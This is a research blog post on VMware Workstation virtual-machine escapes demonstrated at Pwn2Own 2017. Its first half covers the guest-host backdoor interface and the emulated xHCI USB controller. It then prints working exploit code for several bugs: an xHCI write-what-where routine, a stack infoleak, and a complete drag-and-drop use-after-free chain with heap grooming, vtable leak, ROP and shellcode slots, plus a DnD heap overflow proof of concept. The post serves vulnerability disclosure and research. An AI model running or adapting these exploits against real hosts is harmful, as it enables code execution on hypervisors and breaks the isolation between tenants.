A bunch of Red Pills: VMware Escapes


by Marco Grassi, Azureyang, Jackyxty

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for cloud, and VMware Workstation and Fusion for Desktops (Windows, Linux, macOS).
The technology is very well known to the public: it allows users to run unmodified guest “virtual machines”.
Often those virtual machines are not trusted, and they must be isolated.
VMware goes to a great deal to offer this isolation, especially on the ESXi product where virtual machines of different actors can potentially run on the same hardware. So a strong isolation of is paramount importance.

Recently at Pwn2Own the “Virtualization” category was introduced, and VMware was among the targets since Pwn2Own 2016.

In 2017 we successfully demonstrated a VMware escape from a guest to the host from a unprivileged account, resulting in executing code on the host, breaking out of the virtual machine.

If you escape your virtual machine environment then all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how VMware works?

In a nutshell it often uses (but they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time.

But a modern system is not just a CPU and Memory, it also requires lot of other Hardware to work properly and be useful.

This point is very important because it will consist of one of the biggest attack surfaces of VMware: the virtualized hardware.

Virtualizing a hardware device is not a trivial task. It’s easily realized by reading any datasheet for hardware software interface for a PC hardware device.

VMware will trap on I/O access on this virtual device and it needs to emulate all those low level operations correctly, since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.

Furthermore if you ever used VMware you might have noticed its copy paste capabilities, and shared folders. How those are implemented?

To summarize, in this blog post we will cover quite some bugs. Both in this “backdoor” functionalities that support those “extra” services such as C&P, and one in a virtualized device.

Altough recently lot of VMware blogpost and presentations were released, we felt the need to write our own for the following reasons:

  • First, no one ever talked correctly about our Pwn2Own bugs, so we want to shed light on them.
  • Second, some of those published resources either lack of details or code.

So we hope you will enjoy our blogpost!

We will begin with some background informations to get you up to speed.

Let’s get started!

Overall architecture

A complex product like VMware consists of several components, we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

  • VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run and also handles all the tasks which are impossible to perform from the host ring 3 for example.
  • vmnat: vmnat is responsible for the network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
  • vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles lot of tasks which are relevant for this blogpost, including lot of the device emulation, and backdoor requests handling. The result of the exploitation of the chains we will present will result in code execution on the host in the context of vmware-vmx.

Backdoor

The so called backdoor, it’s not actually a “backdoor”, it’s simply a mechanism implemented in VMware for guest-host and host-guest communication.

A useful resource for understanding this interface is the open-vm-tools repository by VMware itself.

Basically at the lower level, the backdoor consists of 2 IO ports 0x5658 and 0x5659, the first for “traditional” communication, the other one for “high bandwidth” ones.

The guest issues in/out instructions on those ports with some registers convention and it’s able to communicate with the VMware running on the host.

The hypervisor will trap and service the request.

On top of this low level mechanism, vmware implemented some more convenient high level protocols, we encourage you to check the open-vm-tools repository to discover those since they were covered extensively elsewhere we will not spend too much time covering the details.
Just to mention a few of those higher level protocols: drag and drop, copy and paste, guestrpc.

The fundamental points to remember are:

  • It’s a interface guest-host that we can use
  • It exposes complex services and functionalities.
  • Lot of these functionalities can be used from ring3 in the guest VM

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification of a USB host controller (normally implemented in hardware in normal PC) by Intel which supports USB 1.x, 2.0 and 3.x.

You can find the relevant specification here.

On a physical machine it’s often present:

1
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device.

The interaction, like with a lot of hardware devices, will take place in the PCI memory space and in the IO memory mapped space.

This very low level interface is the one used by the OS kernel driver in order to schedule usb work, and receive data and all the tasks related to USB.

Just by looking at the specifications alone, which are more than 600 pages, it’s no surprise that this piece of hardware and its interface are very complex, and the specifications just covers the interface and the behavior, not the actual implementation.

Now imagine actually emulating this complex hardware. You can imagine it’s a very complex and error prone task, as we will see soon.

Often to speak directly with the hardware (and by consequence also virtualized hardware), you need to run in ring0 in the guest. That’s why (as you will see in the next paragraphs) we used a Windows Kernel LPE inside the VM.

Mitigations

VMware ships with “baseline” mitigations which are expected in modern software, such as ASLR, stack cookies etc.

More advanced Windows mitigations such as CFG, Microsoft version of Control Flow Integrity and others, are not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest.

The following vulnerabilities were identified and analyzed:

  • XHCI: CVE-2017-4904 critical Uninitialized stack value leading to arbitrary code execution
  • CVE-2017-4905 moderate Uninitialized memory read leading to information disclosure

CVE-2017-4904 xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated XHCI device, when updating the changes of Device Context into the guest physical memory.

The XHCI reports some status info to system software through “Device Context” structure. The address of a Device Context is in the DCBAA (Device Context Base Address Array), whose address is in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and DCBAA resides in the physical RAM. And the XHCI device will keep an internal cache of the Device Context and only updates the one in physical memory when some changes happen. When updating the Device Context, the virtual machine monitor will map the guest physical memory containing the Device Context into the memory space of the monitor process, then do the update. However the mapping could fail and leave the result variable untouched. The code does not take precaution against it and directly uses the result as a destination address for memory writing, resulting an uninitialized variable vulnerability.

To trigger this bug, the following steps should be taken:

  1. Issue a “Enable Slot” command to XHCI. Get the result slot number from Event TRB.
  2. Set the DCBAAP to point to a controlled buffer.
  3. Put some invalid physical address, eg. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
  4. Issue an “Address Device” command. The XHCI will read the base address of Device Context from DCBAA to an internal cache and the value is an controlled invalid address.
  5. Issue an “Configure Endpoint” command. Trigger the bug when XHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the “Configure Endpoint” command with one of the Endpoint Context of the Input Context which is also on the stack. Therefore we can control the destination address of the write. And the contents to be written are from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting a write-what-where primitive. By combining with the info leak vulnerability, we can overwrite some function pointers and finally rop to get arbitrary code execution.

Exploit code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
xhci_cap_regs *cap_regs = (xhci_cap_regs*)xhci_base;
xhci_op_regs *op_regs = (xhci_op_regs*)(xhci_base + (cap_regs->hc_capbase & 0xff));
xhci_doorbell_array *db = (xhci_doorbell_array*)(xhci_base + cap_regs->db_off);
int max_slots = cap_regs->hcs_params1 & 0xf;
uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
if (!playground) return;
playground[0] = 0;
uint64 *dcbaa = (uint64*)playground;
playground += sizeof(uint64) * max_slots;
for (int i = 0; i < max_slots; ++i)
{
dcbaa[i] = 0xffffffffffffffc0;
}
op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;

playground = (uint8*)(((uint64)playground + 0x10) & (~0xf));
input_context *input_ctx = (input_context*)playground;

playground += sizeof(input_context);
playground = (uint8*)(((uint64)playground + 0x40) & (~0x3f));
uint8 *cring = playground;
uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;

trb_t *cmd = (trb_t*)cring;
memset((void*)cmd, 0, sizeof(trb_t));
TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
TRB_SET(C, cmd, 1);
cmd++;
memset(input_ctx, 0, sizeof(input_context));
input_ctx->ctrl_ctx.drop_flags = 0;
input_ctx->ctrl_ctx.add_flags = 3;
input_ctx->slot_ctx.context_entries = 1;
memset((void*)cmd, 0, sizeof(trb_t));
TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
TRB_SET(ID, cmd, 1);
TRB_SET(DC, cmd, 1);
cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
TRB_SET(C, cmd, 1);
cmd++;
TRB_SET(C, cmd, 0);
op_regs->cmd_ring = cmd_ring;
db.doorbell[0] = 0;

cmd = (trb_t*)cring;
memset(input_ctx, 0, sizeof(input_context));
input_ctx->ctrl_ctx.drop_flags = 0;
input_ctx->ctrl_ctx.add_flags = (1u<<31)|(1u<<30);
input_ctx->slot_ctx.context_entries = 31;
uint64 *value = (uint64*)(&input_ctx->ep_ctx[30]);
uint64 *addr = ((uint64*)(&input_ctx->ep_ctx[31])) + 1;
value[0] = 0;
value[1] = what;
value[2] = 0;
addr[0] = where - 0x3b8;
memset((void*)cmd, 0, sizeof(trb_t));
TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
TRB_SET(ID, cmd, 1);
TRB_SET(DC, cmd, 0);
cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
TRB_SET(C, cmd, 1);
cmd++;
TRB_SET(C, cmd, 0);
op_regs->cmd_ring = cmd_ring;
db.doorbell[0] = 0;
}

CVE-2017-4905 Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the Backdoor callback handler. A buffer will be allocated on the stack when processing the backdoor requests. This buffer should be initialized in the BDOORHB callback. But when requesting invalid commands, the callback fails to properly clear the buffer, causing the uninitialized content of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of vmware-vmx running on the host. The successful rate to exploit this bug is 100%.

Credits to JunMao of Tencent PCManager.

PoC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
void infoleak()
{
char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
memset(buf, 0, 0x8000);
Backdoor_proto_hb hb;
memset(&hb, 0, sizeof(Backdoor_proto_hb));
hb.in.size = 0x8000;
hb.in.dstAddr = (uintptr_t)buf;
hb.in.bx.halfs.low = 2;
Backdoor_HbIn(&hb);
// buf will be filled with contents leaked from vmware-vmx stack
//
...
VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
return;
}

Behind the scenes of Pwn2Own 2017

Exploit the UAF bug in VMware Workstation Drag n Drop with single bug

By fuzzing VMware workstation, we found this bug and complete the whole stable exploit chain using this single bug in the last few days of Feb. 2017. Unfortunately this bug was patched in VMware workstation 12.5.3 released on 9 Mar. 2017. After we noticed few papers talked about this bug, and VMware even have no CVE id assigned to this bug. That’s such a pity because it’s the best bug we have ever seen in VMware workstaion, and VMware just patched it quietly. Now we’re going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

This exploit successful rate is approximately 100%.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";
typedef struct _DnDCPMsgHdrV4
{
char magic[14];
char dummy[2];
size_t ropper[13];
char shellcode[175];
char padding[0x80];
} DnDCPMsgHdrV4;


void PrepareLFH()
{
char *result = NULL;
char *pObj = malloc(cbObj);
memset(pObj, 'A', cbObj);
pObj[cbObj - 1] = 0;
for (int idx = 0; idx < 1; ++idx) // just occupy 1
{
char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); //alloc one to occupy 4
}
free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
Message_Channel *chans[5] = {0};
for (int i = 0; i < 5; ++i)
{
chans[i] = Message_Open(0x49435052);
if (chans[i])
{
Message_SendSize(chans[i], cbObj - 1); //just alloc
}
else
{
Message_Close(chans[i - 1]); //keep 1 channel valid
chans[i - 1] = 0;
break;
}
}
PrepareLFH(); //make sure we have at least 7 hole or open and occupy next LFH block
for (int i = 0; i < 5; ++i)
{
if (chans[i])
{
Message_Close(chans[i]);
}
}

char *result = NULL;
char *pObj = malloc(cbObj);
memset(pObj, 'A', cbObj);
pObj[cbObj - 1] = 0;
char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
while (1)
{
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}

for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
Message_Channel *chan = Message_Open(0x49435052);
if (chan == NULL)
{
puts("Message send error!");
Sleep(100);
}
else
{
Message_SendSize(chan, cbObj - 1);
Message_RawSend(chan, "\xA0\x75", 2); //just ret
Message_Close(chan);
}
}
Message_Channel *chan = Message_Open(0x49435052);
Message_SendSize(chan, cbObj - 1);
Message_RawSend(chan, "\xA0\x74", 2); //free
RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); //trigger double free
for (int i = 0; i < min(cbObj-3,MAX_LFH_BLOCK); ++i)
{
RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
Message_RawSend(chan, "B", 1);
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
{
Message_Close(chan); //free the string
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
puts("Trying to leak vtable");
RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
size_t p = 0;
if (result)
{
memcpy(&p, result, min(strlen(result), 8));
printf("Leak content: %p\n", p);
}
size_t low = p & 0xFFFF;
if (low == 0x74A8 || //RpcBase
low == 0x74d0 || //CpV4
low == 0x7630) //DnDV4
{
printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
return (p & (~0xFFFF)) - 0x7a0000;
}
RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}
}
}
Message_Close(chan);
}
return 0;
}

void exploit(size_t base)
{
char *result = NULL;
char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
char *pObj = malloc(cbObj);
memset(pObj, 0, cbObj);

DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
memcpy(hdr->magic, call_transport, strlen(call_transport));
while (1)
{
RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
for (int i = 0; i < MAX_LFH_BLOCK; ++i)
{
Message_Channel *chan = Message_Open(0x49435052);
Message_SendSize(chan, cbObj - 1);
size_t fake_vtable[] = {
base + 0xB87340,
base + 0xB87340,
base + 0xB87340,
base + 0xB87340};

memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

Message_RawSend(chan, pObj, sizeof(size_t) * 4);
Message_Close(chan);
}
RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
//check pwn success?
RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
if (*(size_t *)result == 0xdeadbeefc0debabe)
{
puts("VMware escape success! \nPwned by KeenLab, Tencent");
RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
return;
}
//host dndv4 fill in, try to clean up and free again
Sleep(100);
puts("Object wrong! Retry...");
RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
}
}

int main(int argc, char *argv[])
{
int ret = 1;
__try
{
while (1)
{
size_t base = 0;
do
{
puts("Leaking...");
base = infoleak();
} while (!base);
puts("Pwning...");
exploit(base);
break;
}
}
__except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
{
fprintf(stderr, NOT_VMWARE_ERROR);
return 1;
}
return ret;
}

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.

After VMware released 12.5.3, we continued auditing the DnD and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known by almost every participants of VMware category in Pwn2own 2017. Here we present the PoC of this bug.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void poc()
{
int n;
char *req1 = "tools.capability.dnd_version 3";
char *req2 = "vmx.capability.dnd_version";
RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

char req3[0x80] = "dnd.transport ";
n = strlen(req3);
*(int*)(req3+n) = 3;
*(int*)(req3+n+4) = 0;
*(int*)(req3+n+8) = 0x100;
*(int*)(req3+n+0xc) = 0;
*(int*)(req3+n+0x10) = 0;
// allocate buffer of 0x100 bytes
RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

char req4[0x1000] = "dnd.transport ";
n = strlen(req4);
*(int*)(req4+n) = 3;
*(int*)(req4+n+4) = 0;
*(int*)(req4+n+8) = 0x1000;
*(int*)(req4+n+0xc) = 0x800;
*(int*)(req4+n+0x10) = 0;
for (int i = 0; i < 0x800; ++i)
req4[n+0x14+i] = 'A';
// overflow with 0x800 bytes of 'A'
RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}

Conclusions

In this article we presented several VMware bugs leading to guest to host virtual machine escape.
We hope to have demonstrated that not only VM breakouts are possible and real, but also that a determined attacker can achieve multiple of them, and with good reliability.
We feel that in our industry there is the misconception that if untrusted software runs inside a VM, then we will be safe.
Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud which basically runs on hypervisors.
For sure it’s an additional protection layer, raising the bar for an attacker to get full compromise, so it’s a very good practice to adopt it.
But we must not forget that essentially it’s just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure also this security layer.